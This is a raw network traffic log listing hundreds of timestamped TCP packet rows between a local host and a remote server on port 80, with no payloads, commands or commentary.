Jan 6, 2025 06:03:58.996123075 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996133089 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996134996 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996153116 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996175051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996417046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996428967 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996438980 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996462107 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996483088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996550083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996561050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996576071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996587992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996598959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996604919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996625900 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996653080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996711016 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996721029 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996758938 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996807098 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996819019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996828079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996839046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996849060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996855974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996865988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996871948 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996876001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996881962 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996887922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.996892929 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996941090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.996941090 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997162104 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997174025 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997183084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997194052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997205019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997212887 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997215986 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997226000 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997234106 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997241974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997248888 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997257948 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997268915 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997267962 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997279882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997289896 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997292995 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997299910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997308016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997309923 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997317076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997322083 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997329950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997330904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997342110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997349977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997351885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997363091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997370958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997374058 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997380972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997387886 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997391939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997411966 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997436047 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997881889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997893095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997899055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997910023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997920036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.997935057 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.997961044 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998051882 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998063087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998073101 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998083115 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998092890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998100996 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998104095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998121023 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998146057 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998343945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998353958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998363972 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998375893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998385906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998395920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998394966 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998394966 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998405933 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998414993 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998420954 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998425007 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998435974 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998440981 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998446941 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998457909 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998471022 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998485088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998517036 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998687983 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998698950 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998708963 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998718023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:58.998725891 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:58.998754978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085344076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085385084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085401058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085443020 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085452080 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085453987 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085464954 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085475922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085493088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085493088 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085549116 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085593939 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085604906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085621119 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085630894 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085654974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085654974 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085686922 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085746050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085757017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085767031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085776091 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085787058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085789919 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085809946 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085838079 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085880041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085890055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085900068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.085922003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.085947037 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086024046 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086034060 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086044073 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086054087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086065054 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086070061 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086075068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086085081 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086097956 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086122990 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086150885 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086309910 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086321115 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086329937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086340904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086352110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086359978 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086361885 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086371899 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086381912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086393118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086399078 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086399078 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086421967 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086446047 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086596966 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086657047 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086694956 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086707115 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086716890 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086729050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086738110 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086740017 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086750031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086760998 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086776018 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086776018 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086915016 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.086967945 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086978912 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086988926 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.086999893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087009907 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087018013 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087022066 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087033033 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087038040 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087043047 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087053061 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087054968 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087091923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087091923 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087116003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087277889 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087289095 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087299109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087310076 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087325096 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087335110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087337971 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087341070 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087347984 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087356091 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087385893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087385893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087398052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087409019 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087418079 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087428093 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087433100 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087438107 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087449074 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087459087 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087462902 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087470055 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087480068 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087482929 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087491989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087497950 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087502003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.087532997 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.087549925 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088057041 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088068008 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088078022 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088088989 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088099957 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088099957 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088109970 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088116884 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088120937 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088131905 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088141918 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088143110 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088165998 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088181973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088417053 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088427067 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088437080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088448048 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088458061 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088464975 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088469028 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088479996 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088485003 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088489056 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088500023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088504076 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088510036 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088519096 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088520050 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088530064 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088541031 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088538885 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088558912 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088579893 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088746071 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088757038 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088767052 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088792086 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088816881 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088903904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088913918 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088931084 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088947058 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088952065 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088956118 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088965893 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088975906 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088985920 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.088995934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.088995934 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089000940 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089011908 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089015961 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089021921 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089032888 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089035034 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089044094 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089054108 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089059114 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089063883 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089072943 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089075089 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089085102 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089097023 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089097977 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089107037 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089118958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.089127064 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089140892 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.089163065 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176126003 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176162958 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176179886 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176192045 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176202059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176208973 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176213026 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176245928 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176245928 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176276922 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176306963 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176341057 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176352024 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176362991 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176373005 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176383018 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176384926 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176407099 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176508904 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176520109 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176553965 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176621914 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176632881 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176639080 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176651001 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176753044 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176758051 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176764011 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176774979 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176784992 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176793098 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176795959 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176806927 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176816940 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176819086 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.176826954 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.176851034 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177010059 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177022934 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177037954 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177052021 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177053928 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177062988 CET	80	49709	23.27.51.244	192.168.2.6
Jan 6, 2025 06:03:59.177072048 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177099943 CET	49709	80	192.168.2.6	23.27.51.244
Jan 6, 2025 06:03:59.177294970 CET	80	49709	23.27.51.244	192.168.2.6
